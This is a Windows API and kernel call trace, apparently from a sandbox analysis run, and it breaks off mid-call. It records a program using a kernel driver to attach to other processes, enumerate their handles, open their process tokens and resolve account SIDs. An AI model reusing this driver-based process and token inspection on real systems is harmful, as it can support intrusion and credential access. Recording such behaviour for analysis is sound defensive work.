DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0246.614] PsLookupProcessByProcessId (in: ProcessId=0x98c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.614] PsAcquireProcessExitSynchronization () returned 0x0 [0246.614] KeStackAttachProcess (in: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0) [0246.614] ObReferenceObjectByHandle (in: Handle=0x270, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002853710, HandleInformation=0x0) returned 0x0 [0246.614] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.614] PsReleaseProcessExitSynchronization () returned 0x2 [0246.614] ObfDereferenceObject (Object=0xfffffa8002fe8060) returned 0x45 [0246.614] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.614] ObfDereferenceObject (Object=0xfffffa8002853710) returned 0x1 [0246.614] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.614] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.614] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.614] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x162, lpOverlapped=0x0) returned 1 [0246.614] PsLookupProcessByProcessId (in: ProcessId=0x98c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.614] PsAcquireProcessExitSynchronization () returned 0x0 [0246.614] KeStackAttachProcess (in: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0) [0246.615] ObReferenceObjectByHandle (in: Handle=0x278, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002856dd0, HandleInformation=0x0) returned 0x0 [0246.615] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.615] PsReleaseProcessExitSynchronization () returned 0x2 [0246.615] ObfDereferenceObject (Object=0xfffffa8002fe8060) returned 0x45 [0246.615] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.615] ObfDereferenceObject (Object=0xfffffa8002856dd0) returned 0x6 [0246.615] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.615] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.615] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.615] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.615] PsLookupProcessByProcessId (in: ProcessId=0x98c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.615] PsAcquireProcessExitSynchronization () returned 0x0 [0246.615] KeStackAttachProcess (in: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0) [0246.615] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a003202060, HandleInformation=0x0) returned 0x0 [0246.615] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.615] PsReleaseProcessExitSynchronization () returned 0x2 [0246.615] ObfDereferenceObject (Object=0xfffffa8002fe8060) returned 0x45 [0246.615] ObQueryNameString (in: Object=0xfffff8a003202060, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.615] ObfDereferenceObject (Object=0xfffff8a003202060) returned 0x1 [0246.615] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.615] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b8) returned 0xc8 [0246.615] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.616] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80030cd310, HandleInformation=0x0) returned 0x0 [0246.616] ObOpenObjectByPointer (in: Object=0xfffffa80030cd310, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.616] ObfDereferenceObject (Object=0xfffffa80030cd310) returned 0x14 [0246.616] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8003ab1940 | out: TokenHandle=0xfffffa8003ab1940*=0xc4) returned 0x0 [0246.616] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.616] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.616] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.616] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.726] CloseHandle (hObject=0xc4) returned 1 [0246.726] CloseHandle (hObject=0xc8) returned 1 [0246.726] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.726] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.726] PsLookupProcessByProcessId (in: ProcessId=0x6b8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.726] PsAcquireProcessExitSynchronization () returned 0x0 [0246.726] KeStackAttachProcess (in: PROCESS=0xfffffa80030cd310, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80030cd310, ApcState=0xfffff880053c85d0) [0246.726] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800240bdd0, HandleInformation=0x0) returned 0x0 [0246.726] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.726] PsReleaseProcessExitSynchronization () returned 0x2 [0246.726] ObfDereferenceObject (Object=0xfffffa80030cd310) returned 0x12 [0246.726] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.726] ObfDereferenceObject (Object=0xfffffa800240bdd0) returned 0x1 [0246.726] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.727] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.727] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.727] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0246.727] PsLookupProcessByProcessId (in: ProcessId=0x6b8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.727] PsAcquireProcessExitSynchronization () returned 0x0 [0246.727] KeStackAttachProcess (in: PROCESS=0xfffffa80030cd310, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80030cd310, ApcState=0xfffff880053c85d0) [0246.727] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800290f070, HandleInformation=0x0) returned 0x0 [0246.727] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.727] PsReleaseProcessExitSynchronization () returned 0x2 [0246.727] ObfDereferenceObject (Object=0xfffffa80030cd310) returned 0x12 [0246.727] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.727] ObfDereferenceObject (Object=0xfffffa800290f070) returned 0x1 [0246.727] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.727] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.727] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.727] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0246.727] PsLookupProcessByProcessId (in: ProcessId=0x6b8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.727] PsAcquireProcessExitSynchronization () returned 0x0 [0246.727] KeStackAttachProcess (in: PROCESS=0xfffffa80030cd310, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80030cd310, ApcState=0xfffff880053c85d0) [0246.727] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80026ac5f0, HandleInformation=0x0) returned 0x0 [0247.554] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.554] PsReleaseProcessExitSynchronization () returned 0x2 [0247.554] ObfDereferenceObject (Object=0xfffffa80030cd310) returned 0x12 [0247.555] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.555] ObfDereferenceObject (Object=0xfffffa80026ac5f0) returned 0x3 [0247.555] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.555] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.555] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.555] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2e, lpOverlapped=0x0) returned 1 [0247.555] PsLookupProcessByProcessId (in: ProcessId=0x6b8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.555] PsAcquireProcessExitSynchronization () returned 0x0 [0247.555] KeStackAttachProcess (in: PROCESS=0xfffffa80030cd310, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80030cd310, ApcState=0xfffff880053c85d0) [0247.555] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002550740, HandleInformation=0x0) returned 0x0 [0247.555] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.555] PsReleaseProcessExitSynchronization () returned 0x2 [0247.555] ObfDereferenceObject (Object=0xfffffa80030cd310) returned 0x12 [0247.555] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.555] ObfDereferenceObject (Object=0xfffffa8002550740) returned 0x1 [0247.555] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.555] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x69c) returned 0xc8 [0247.555] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.555] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80030df060, HandleInformation=0x0) returned 0x0 [0247.555] ObOpenObjectByPointer (in: Object=0xfffffa80030df060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0247.556] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x26 [0247.556] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002545e80 | out: TokenHandle=0xfffffa8002545e80*=0xc4) returned 0x0 [0247.556] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0247.556] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.556] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.556] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.558] CloseHandle (hObject=0xc4) returned 1 [0247.558] CloseHandle (hObject=0xc8) returned 1 [0247.558] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.558] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0247.558] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.558] PsAcquireProcessExitSynchronization () returned 0x0 [0247.558] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0) [0247.558] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003249d10, HandleInformation=0x0) returned 0x0 [0247.558] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.558] PsReleaseProcessExitSynchronization () returned 0x2 [0247.558] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0247.558] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.558] ObfDereferenceObject (Object=0xfffffa8003249d10) returned 0x1 [0247.558] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.558] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.558] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.558] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0247.558] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.558] PsAcquireProcessExitSynchronization () returned 0x0 [0247.559] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0) [0247.559] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fe9790, HandleInformation=0x0) returned 0x0 [0247.559] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.559] PsReleaseProcessExitSynchronization () returned 0x2 [0247.559] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0247.559] ObQueryNameString (in: Object=0xfffffa8001fe9790, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.559] ObfDereferenceObject (Object=0xfffffa8001fe9790) returned 0x1 [0247.559] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.559] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.559] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.559] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0247.559] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.559] PsAcquireProcessExitSynchronization () returned 0x0 [0247.559] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0) [0247.559] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0247.559] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.559] PsReleaseProcessExitSynchronization () returned 0x2 [0247.559] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0247.559] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.559] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x51 [0247.559] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.559] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.559] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.559] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0247.560] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.560] PsAcquireProcessExitSynchronization () returned 0x0 [0247.560] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0) [0247.560] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80023e7070, HandleInformation=0x0) returned 0x0 [0247.560] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.560] PsReleaseProcessExitSynchronization () returned 0x2 [0247.560] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0247.560] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.560] ObfDereferenceObject (Object=0xfffffa80023e7070) returned 0x1 [0247.560] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.560] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.560] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.560] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0247.560] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.560] PsAcquireProcessExitSynchronization () returned 0x0 [0247.560] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0) [0247.560] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a002267160, HandleInformation=0x0) returned 0x0 [0247.560] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.560] PsReleaseProcessExitSynchronization () returned 0x2 [0247.560] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0247.560] ObQueryNameString (in: Object=0xfffff8a002267160, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.560] ObfDereferenceObject (Object=0xfffff8a002267160) returned 0x1 [0247.560] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.560] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.560] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.560] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0247.560] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.561] PsAcquireProcessExitSynchronization () returned 0x0 [0247.561] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880053c85d0) [0247.561] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002f8fda0, HandleInformation=0x0) returned 0x0 [0247.561] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.561] PsReleaseProcessExitSynchronization () returned 0x2 [0247.561] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0247.561] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, 